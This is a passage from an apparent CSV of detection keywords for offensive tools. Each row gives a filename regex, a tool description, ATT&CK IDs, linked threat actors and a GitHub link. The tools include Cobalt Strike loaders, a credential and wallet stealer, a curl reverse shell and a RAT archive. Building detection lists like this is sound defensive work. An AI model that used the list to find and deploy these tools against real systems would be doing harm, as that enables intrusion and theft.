TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa 
- PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mez-0/winrmdll","1","1","N/A","N/A","10","10","144","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z","6313" "*/C--Shellcode*",".{0,1000}\/C\-\-Shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","N/A","10","10","20","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z","6314" "*/CS-Loader.go*",".{0,1000}\/CS\-Loader\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","6315" "*/CS-Loader/*",".{0,1000}\/CS\-Loader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","6316" "*/CsOnTheFly.ps1*",".{0,1000}\/CsOnTheFly\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - 
T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","6317" "*/csOnvps/*",".{0,1000}\/csOnvps\/.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","6318" "*/csOnvps/*",".{0,1000}\/csOnvps\/.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","6319" 
"*/cs-rdll-ipc-example/*",".{0,1000}\/cs\-rdll\-ipc\-example\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","N/A","10","10","116","23","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z","6320" "*/CS-Remote-OPs-BOF*",".{0,1000}\/CS\-Remote\-OPs\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","6321" "*/cstealer.git*",".{0,1000}\/cstealer\.git.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. 
app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","1","N/A","N/A","10","","N/A","","","","6322" "*/cstealer.py*",".{0,1000}\/cstealer\.py.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","1","N/A","N/A","10","","N/A","","","","6323" "*/cs-token-vault/*",".{0,1000}\/cs\-token\-vault\/.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - 
NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","N/A","10","10","142","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z","6324" "*/Cstrike Rat.exe*",".{0,1000}\/Cstrike\sRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6325" "*/ctfr.py*",".{0,1000}ctfr\.py.{0,1000}","offensive_tool_keyword","ctfr","Abusing Certificate Transparency logs for getting HTTPS websites subdomains.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Reconnaissance","https://github.com/UnaPibaGeek/ctfr","1","0","N/A","N/A","N/A","10","2015","297","2024-01-02T17:19:37Z","2018-03-06T01:14:28Z","6326" "*/ctftool*",".{0,1000}ctftool.{0,1000}","offensive_tool_keyword","ctftool","This is ctftool. an interactive command line tool to experiment with CTF. a little-known protocol used on Windows to implement Text Services. This might be useful for studying Windows internals. 
debugging complex issues with Text Input Processors and analyzing Windows security.","T1547.001 - T1059 - T1057","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/taviso/ctftool","1","0","N/A","N/A","N/A","10","1655","269","2021-09-17T21:02:25Z","2019-06-07T03:39:10Z","6327" "*/cube0x0/noPac*",".{0,1000}\/cube0x0\/noPac.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/cube0x0/noPac","1","1","N/A","N/A","N/A","10","1365","323","2021-12-16T09:50:15Z","2021-12-11T19:27:30Z","6328" "*/cuddlephish.git*",".{0,1000}\/cuddlephish\.git.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","6329" "*/cuddlephish.html*",".{0,1000}\/cuddlephish\.html.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","6330" "*/cups-info.nse*",".{0,1000}\/cups\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6331" "*/cups-queue-info.nse*",".{0,1000}\/cups\-queue\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6332" "*/curl.cna",".{0,1000}\/curl\.cna","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - 
Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","6333" "*/curl.x64.o",".{0,1000}\/curl\.x64\.o","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - 
Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","6334" "*/curl.x86.o",".{0,1000}\/curl\.x86\.o","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","6335" 
"*/curlshell.git*",".{0,1000}\/curlshell\.git.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","6336" "*/curlshell.git*",".{0,1000}\/curlshell\.git.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","6337" "*/curlshell.py*",".{0,1000}\/curlshell\.py.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","6338" "*/curlshell-main.*",".{0,1000}\/curlshell\-main\..{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","6339" "*/curlshell-main/*",".{0,1000}\/curlshell\-main\/.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","6340" "*/CursedChrome.git*",".{0,1000}\/CursedChrome\.git.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your 